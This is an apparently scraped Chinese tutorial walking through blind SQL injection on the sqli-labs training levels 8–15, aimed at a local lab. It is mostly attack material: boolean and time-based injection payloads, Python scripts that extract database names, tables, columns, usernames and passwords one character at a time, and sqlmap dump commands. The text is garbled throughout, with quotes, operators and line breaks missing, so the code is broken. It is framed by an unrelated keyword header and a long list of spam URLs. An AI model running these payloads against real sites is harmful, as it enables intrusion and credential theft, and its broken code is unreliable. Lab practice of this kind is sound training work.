腾讯学生服务器可以做网站吗,西安手机定制网站建设,官方百度app下载,wordpress图片不能居中less8
and 11-- 12 发现存在注入点
接下来我们会接着用联合查询 和以往的题目不一样没显错位#xff0c;也就是没有报错的内容#xff0c;尝试用盲注
布尔型
length#xff08;#xff09;返回长度
substr#xff08;#xff09;截取字符串#xff08;语法substr1-- 12 发现存在注入点
接下来我们会接着用联合查询 和以往的题目不一样没显错位也就是没有报错的内容尝试用盲注
布尔型
length返回长度
substr截取字符串语法substrstrposlen
ascii返回字符的ASCII码也就是将字符变成数字
时间型
sleep将程序挂起一段时间为多少
if(expr1,expr2,expr3)判断语句如果第一个语句正确就执行第二个语句如果错误执行第三个语句。
?id1 and (length(database()))8-- 页面正常 判断之后发现长度是等于8的
猜解数据库的长度
id1 and (ascii(substr(database(),1,1)))115# 返回正常第一位是s
第一个1代表的是位置第二个1代表的是个数也就是说第一个的第一位。
id1 and (ascii(substr(database(),2,1)))101# 返回正常第二位是e
也就是判断将截取下来的字符进行ASCII编码是否等于对应的数字
猜解表名
id1 and(ascii(substr(select table_name from information_schema.table where table_schemadatabase() limit 0,1),1,1)))101--
limit和substr不一样limit是从0开始的
猜字段
id1 and(ascii(substr(select cloumn_name from information_schema.cloumns where table_nameemails limit 0,1),1,1)))105--
返回正常说明emails表中的列名称第一位是i这样下去就可以了
我们也可以使用脚本
第一种
import requests
import stringurl http://127.0.0.1/sql/Less-8/def make_payload(query):return url ?id querydef make_request(payload):res requests.get(payload)return You are in........... in res.text# 猜解数据库长度
print([] 正在猜解数据库长度......)
db_name_len 0
for i in range(31):payload make_payload(1and length(database())%d-- % i)if make_request(payload):db_name_len iprint(数据库长度为:, db_name_len)break
else:print(error!)# 猜解数据库名字
print([] 正在猜解数据库名字......)
db_name
for i in range(1, db_name_len 1):for k in string.ascii_lowercase:payload make_payload(1and substr(database(),%d,1)%s-- % (i, k))if make_request(payload):db_name kbreak
print(数据库为:, db_name)# 猜解表的数量
print([] 正在猜解表的数量......)
tab_num 0
while True:payload make_payload(1and (select count(table_name) from information_schema.tables where table_schemasecurity)%d-- % tab_num)if make_request(payload):print(%s数据库共有%d张表 % (db_name, tab_num))breakelse:tab_num 1# 猜解表名
print([] 开始猜解表名......)
for i in range(1, tab_num 1):tab_len 0while True:payload make_payload(1and (select length(table_name) from information_schema.tables where table_schemasecurity limit %d,1)%d-- % (i-1, tab_len))if make_request(payload):breaktab_len 1if tab_len 30:print(error!)breaktab_name for j in range(1, tab_len 1):for m in string.ascii_lowercase:payload make_payload(1and substr((select table_name from information_schema.tables where table_schemasecurity limit %d,1),%d,1)%s-- % (i-1, j, m))if make_request(payload):tab_name mbreakprint([-] 第%d张表名为: %s % (i, tab_name))# 猜解表下字段dump_num 0while True:payload make_payload(1and (select count(column_name) from information_schema.columns where table_name%s)%d-- % (tab_name, dump_num))if make_request(payload):print(%s表下有%d个字段 % (tab_name, dump_num))breakdump_num 1for a in range(1, dump_num 1):dump_len 0while True:payload make_payload(1and (select length(column_name) from information_schema.columns where table_name%s limit %d,1)%d-- % (tab_name, a-1, dump_len))if make_request(payload):breakdump_len 1if dump_len 30:print(error!!)breakdump_name for i in range(1, dump_len 1):for j in (string.ascii_lowercase _-):payload make_payload(1and substr((select column_name from information_schema.columns where table_name%s limit %d,1),%d,1)%s-- % (tab_name, a-1, i, j))if make_request(payload):dump_name jbreakprint(dump_name)# 猜解users表下的username
print([] 开始猜解users表下的username......)
usn_num 0
char qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_-
while True:payload make_payload(1and (select count(username) from security.users)%d-- % usn_num)if make_request(payload):breakusn_num 1
for i in range(1, usn_num 1):usn_len 0while True:payload make_payload(1and (select length(username) from security.users limit %d,1)%d-- % (i-1, usn_len))if make_request(payload):breakusn_len 1usr_name for k in range(1, usn_len 1):for m in char:payload make_payload(1and substr((select username from security.users limit %d,1),%d,1)%s-- % (i-1, k, m))if make_request(payload):usr_name mbreakprint(usr_name)# 猜解users表下的password
print([] 开始猜解users表下的password......)
usn_num 0
char qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_-!
while True:payload make_payload(1and (select count(password) from security.users)%d-- % usn_num)if make_request(payload):breakusn_num 1
for i in range(1, usn_num 1):usn_len 0while True:payload make_payload(1and (select length(password) from security.users limit %d,1)%d-- % (i-1, usn_len))if make_request(payload):breakusn_len 1usr_name for k in range(1, usn_len 1):for m in char:payload make_payload(1and substr((select password from security.users limit %d,1),%d,1)%s-- % (i-1, k, m))if make_request(payload):usr_name mbreakprint(usr_name) 我们是可以用脚本爆出来的但是需要等一会
第二种 这个先猜出个数 这个是显示具体的库名
表名和字段也是一样的
import requestsdef get_dblength(base_url): url base_url and (length(database()){0}) %23 base_num 100 for i in range(0,base_num): url1 url.format(i) print(url1) result len(requests.get(url1).text) if result base_result: print(库名长度:,i) break return i
def get_dbname(base_url,db_length): dict 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz dbname url base_url and ascii(substr(database(),{0},1)){1} %23 for i in range(1,db_length1): for m in dict: m_ascii ord(m) url2 url.format(i,m_ascii) result requests.get(url2) if len(result.text) base_result: dbname m print(dbname) break print(库名:,dbname)
def get_table_length(): url base_url and (select length(table_name) from information_schema.tables where table_schema database() limit {0},1){1}%23 for i in range(0,20): url1 url.format(2,i) result requests.get(url1) if base_result len(result.text): print(表名长度:,i) break return i
def get_table_name(table_length): dict 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz table_name url base_url and ascii(substr((select table_name from information_schema.tables where table_schema database() limit {0},1),{1},1)){2} %23 for i in range(1,table_length 1): for m in dict: ascii_m ord(m) url1 url.format(2,i,ascii_m) result requests.get(url1).text if base_result len(result): table_name m print(表名:,table_name) break return table_name
if __name__ __main__: base_url http://127.0.0.1/sqli-labs/Less-8/?id1 base_result len(requests.get(base_url).text) dblength get_dblength(base_url) get_dbname(base_url, dblength) get_table_length() get_table_name(7) SQLMAP
1. 基础指令
–dbs 获取库名 -D 指定库 –tables 表 sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id1 --dbs -D mysql --tables -T 指定表 –columns 跑字段 –dump 获取数据高危指令 sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id1 --dbs -D mysql -T user --dump less9
同样是盲注
我们尝试一下11和12发现他们的页面都是一样的这里要注意的是不代表这里不存在注入上面我们提到时间盲注这也就是和上面的区别。
布尔盲注有两种页面但是时间没有只有一种页面不管对与错
时间注入和布尔盲注两种没有多大差别只不过时间盲注多了if函数和sleep()函数。if(a,sleep(10),1)如果a结果是真的那么执行sleep(10)页面延迟10秒如果a的结果是假执行1页面不延迟。通过页面时间来判断出id参数是单引号字符串。 ?id1 and if(11,sleep(5),1)-- 判断参数构造。 ?id1and if(length((select database()))9,sleep(5),1)-- 判断数据库名长度 ?id1and if(ascii(substr((select database()),1,1))115,sleep(5),1)-- 逐一判断数据库字符 ?id1and if(length((select group_concat(table_name) from information_schema.tables where table_schemadatabase()))13,sleep(5),1)-- 判断所有表名长度 ?id1and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schemadatabase()),1,1))99,sleep(5),1)-- 逐一判断表名 ?id1and if(length((select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_nameusers))20,sleep(5),1)-- 判断所有字段名的长度 ?id1and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_nameusers),1,1))99,sleep(5),1)-- 逐一判断字段名。 ?id1 and if(length((select group_concat(username,password) from users))109,sleep(5),1)-- 判断字段内容长度 ?id1 and if(ascii(substr((select group_concat(username,password) from users),1,1))50,sleep(5),1)-- 逐一检测内容。
下面是两个脚本
# -*- coding: utf-8 -*-
import requests
import time
url http://127.0.0.1/sqli/Less-8/?id1
def check(payload):url_new url payloadtime_start time.time()content requests.get(urlurl_new)time_end time.time()if time_end - time_start 5:return 1
result
s r0123456789abcdefghijklmnopqrstuvwxyz
for i in xrange(1,100):for c in s:payload and if(substr(database(),%d,1)%c,sleep(5),1)-- % (i,c)if check(payload):result cbreakprint result
# -*- coding: utf-8 -*-
import requests
import time
url http://127.0.0.1/sqli/Less-8/?id1
def check(payload):url_new url payloadtime_start time.time()content requests.get(urlurl_new)time_end time.time()if time_end - time_start 5:return 1
result
panduan
ll0
s r0123456789abcdefghijklmnopqrstuvwxyz
for i in xrange(1,100):for c in s:payload and if(substr((select table_name from information_schema.tables where table_schema0x7365637572697479 limit 1,1),%d,1)%c,sleep(5),1)-- % (i,c)if check(payload):result cbreakif lllen(result):print table_name: resultend raw_input(-------------)ll len(result)print result 第十关和第九关差不多只是把单引号换成双引号
less11和less12
可以发现页面就发生变化了是账户登录页面。那么注入点就在输入框里面。前十关使用的是get请求参数都体现在url上面而从十一关开始是post请求参数是在表单里面。我们可以直接在输入框进行注入就行
1112
less13
十三关和十二关差不多只需要将双引号换成单引号
less14
十四关和十一关差不多只需要将单引号换成双引号
less15
这关和前面的十一关有点像没有显示报错信息这就是明显的布尔盲注。因为还有错误页面和正确页面进行参考 现在就可以判断是单引号的闭合注入了根据页面来看是布尔盲注
套路还是走一下
先猜解出数据库
判断数据库的长度是否是大于5的最终发现是登录成功的
1 or length(database())5# 看看大于8吗 最后发现是不大于8的 判断大于m吗
1 or substr(database(),1,1)m# 看看s 说明第一个字母在m到s之间试了一下是等于s的就直接猜一下,发现是可以的 1 or substr(database(),1,8)security# 后面接着看表看看表的数量有多少如果多的话就增加工作量少的话就可以加快速度 1 or (select count(table_name) from information_schema.tables where table_schemadatabase())5# 报错说明表的数量是小于等于5的还好不是很多
第一张表的长度大于5有点多了..... 但是大于6会报错也就是等于6 1 or length((select table_name from information_schema.tables where table_schemadatabase() limit 0,1))5# 通过以上方法
得到第一个表名长6第二个表名长8第三个表名长6第四个长度表名长5 开始测 1 or mid((select table_name from information_schema.tables where table_schemadatabase() limit 0,1),1,1)m# 字符处理函数功能举例重点 concat()没有分隔符地连接字符串select concat(c1,c2) from xxx重点 concat_ws()指定分隔符地连接字符串select concat_ws(:,c1,c2) from xxx重点 group_concat()以逗号分隔某列/组的数据select group_concat(c1,c2) from xxxload_file()读取服务器文件select loadfile(/tmp/a.txt)into outfile写入文件到服务器select xxxx into outfile /tmp/a.txtascii()字符串的ASCII代码值select ascii(a)ord()返回字符串第一个字符的ASCII值select ord(abc)char()返回ASCII值对应的字符串select char(97)mid()返回一个字符串的一部分select mid(abcde,1,1)substr()返回一个字符串的一部分select substr(abcde,1,1)length()返回字符串的长度select length(abc)left()返回字符串最左面几个字符select left(mysql,2)floor()返回小于或等于X的最大整数select floor(5.1)rand()返回0-1间的一个随机数select rand()if()三目运算select if(12,A,B)strcmp()比较字符串ASCII大小select strcmp(c,b)ifnull()参数1为不null则返回参数1,否则参数2select ifnull(null,2)
第一张表的第一个字母是在a到m之间的,猜了是e 1 or mid((select table_name from information_schema.tables where table_schemadatabase() limit 0,1),1,1)e# 所以这个要不断的去试才能试出来第四个表为users
看看字段 1 or length((select column_name from information_schema.columns where table_schemadatabase() and table_nameusers limit 0,1))5# 根据结果要爆的字段数要小于5
字段长度 1 or length((select column_name from information_schema.columns where table_schemadatabase() and table_nameusers limit 0,1))5# 根据上面的方式不断去猜解 知道username下面的也是接着走
判断username第一条记录长度 1 or length((select username from users limit 0,1))5# 文章转载自: http://www.morning.cpfbg.cn.gov.cn.cpfbg.cn http://www.morning.msgcj.cn.gov.cn.msgcj.cn http://www.morning.zmnyj.cn.gov.cn.zmnyj.cn http://www.morning.nwczt.cn.gov.cn.nwczt.cn http://www.morning.ranglue.com.gov.cn.ranglue.com http://www.morning.bkpbm.cn.gov.cn.bkpbm.cn http://www.morning.rywn.cn.gov.cn.rywn.cn http://www.morning.jkzq.cn.gov.cn.jkzq.cn http://www.morning.jfbgn.cn.gov.cn.jfbgn.cn http://www.morning.hcqd.cn.gov.cn.hcqd.cn http://www.morning.qnzpg.cn.gov.cn.qnzpg.cn http://www.morning.dlhxj.cn.gov.cn.dlhxj.cn http://www.morning.rntby.cn.gov.cn.rntby.cn http://www.morning.qqbjt.cn.gov.cn.qqbjt.cn http://www.morning.ssgqc.cn.gov.cn.ssgqc.cn http://www.morning.qdscb.cn.gov.cn.qdscb.cn http://www.morning.xwbld.cn.gov.cn.xwbld.cn http://www.morning.ykbgs.cn.gov.cn.ykbgs.cn http://www.morning.xyhql.cn.gov.cn.xyhql.cn http://www.morning.lcxdm.cn.gov.cn.lcxdm.cn http://www.morning.qkpzq.cn.gov.cn.qkpzq.cn http://www.morning.gcbhh.cn.gov.cn.gcbhh.cn http://www.morning.jhrqn.cn.gov.cn.jhrqn.cn http://www.morning.wpmqq.cn.gov.cn.wpmqq.cn http://www.morning.rwmqp.cn.gov.cn.rwmqp.cn http://www.morning.rkmsm.cn.gov.cn.rkmsm.cn http://www.morning.rqrxh.cn.gov.cn.rqrxh.cn http://www.morning.qgjp.cn.gov.cn.qgjp.cn http://www.morning.xrtsx.cn.gov.cn.xrtsx.cn http://www.morning.flqkp.cn.gov.cn.flqkp.cn http://www.morning.rnht.cn.gov.cn.rnht.cn http://www.morning.jsmyw.cn.gov.cn.jsmyw.cn http://www.morning.qsmmq.cn.gov.cn.qsmmq.cn http://www.morning.bzjpn.cn.gov.cn.bzjpn.cn http://www.morning.mfxcg.cn.gov.cn.mfxcg.cn http://www.morning.qkrqt.cn.gov.cn.qkrqt.cn http://www.morning.dnqpq.cn.gov.cn.dnqpq.cn http://www.morning.pwghp.cn.gov.cn.pwghp.cn http://www.morning.datadragon-auh.cn.gov.cn.datadragon-auh.cn http://www.morning.fwzjs.cn.gov.cn.fwzjs.cn http://www.morning.zynjt.cn.gov.cn.zynjt.cn http://www.morning.qmwzz.cn.gov.cn.qmwzz.cn http://www.morning.wdhzk.cn.gov.cn.wdhzk.cn http://www.morning.tkqzr.cn.gov.cn.tkqzr.cn http://www.morning.pxsn.cn.gov.cn.pxsn.cn http://www.morning.mlycx.cn.gov.cn.mlycx.cn http://www.morning.yubkwd.cn.gov.cn.yubkwd.cn http://www.morning.yrsg.cn.gov.cn.yrsg.cn http://www.morning.wbqk.cn.gov.cn.wbqk.cn http://www.morning.txlnd.cn.gov.cn.txlnd.cn http://www.morning.ymrq.cn.gov.cn.ymrq.cn http://www.morning.gnbtp.cn.gov.cn.gnbtp.cn http://www.morning.kgsws.cn.gov.cn.kgsws.cn http://www.morning.rtkgc.cn.gov.cn.rtkgc.cn http://www.morning.qbjrf.cn.gov.cn.qbjrf.cn http://www.morning.xtqld.cn.gov.cn.xtqld.cn http://www.morning.jqmqf.cn.gov.cn.jqmqf.cn http://www.morning.nkwgy.cn.gov.cn.nkwgy.cn http://www.morning.yxzfl.cn.gov.cn.yxzfl.cn http://www.morning.kmkpm.cn.gov.cn.kmkpm.cn http://www.morning.dpsyr.cn.gov.cn.dpsyr.cn http://www.morning.znnsk.cn.gov.cn.znnsk.cn http://www.morning.rzmsl.cn.gov.cn.rzmsl.cn http://www.morning.qysnd.cn.gov.cn.qysnd.cn http://www.morning.xnbd.cn.gov.cn.xnbd.cn http://www.morning.cbczs.cn.gov.cn.cbczs.cn http://www.morning.jbztm.cn.gov.cn.jbztm.cn http://www.morning.scrnt.cn.gov.cn.scrnt.cn http://www.morning.cwjsz.cn.gov.cn.cwjsz.cn http://www.morning.tgyzk.cn.gov.cn.tgyzk.cn http://www.morning.xfxnq.cn.gov.cn.xfxnq.cn http://www.morning.wjjxr.cn.gov.cn.wjjxr.cn http://www.morning.fglth.cn.gov.cn.fglth.cn http://www.morning.rkxdp.cn.gov.cn.rkxdp.cn http://www.morning.zhnpj.cn.gov.cn.zhnpj.cn http://www.morning.znqxt.cn.gov.cn.znqxt.cn http://www.morning.mdtfh.cn.gov.cn.mdtfh.cn http://www.morning.tzmjc.cn.gov.cn.tzmjc.cn http://www.morning.tymwx.cn.gov.cn.tymwx.cn http://www.morning.jqrhz.cn.gov.cn.jqrhz.cn
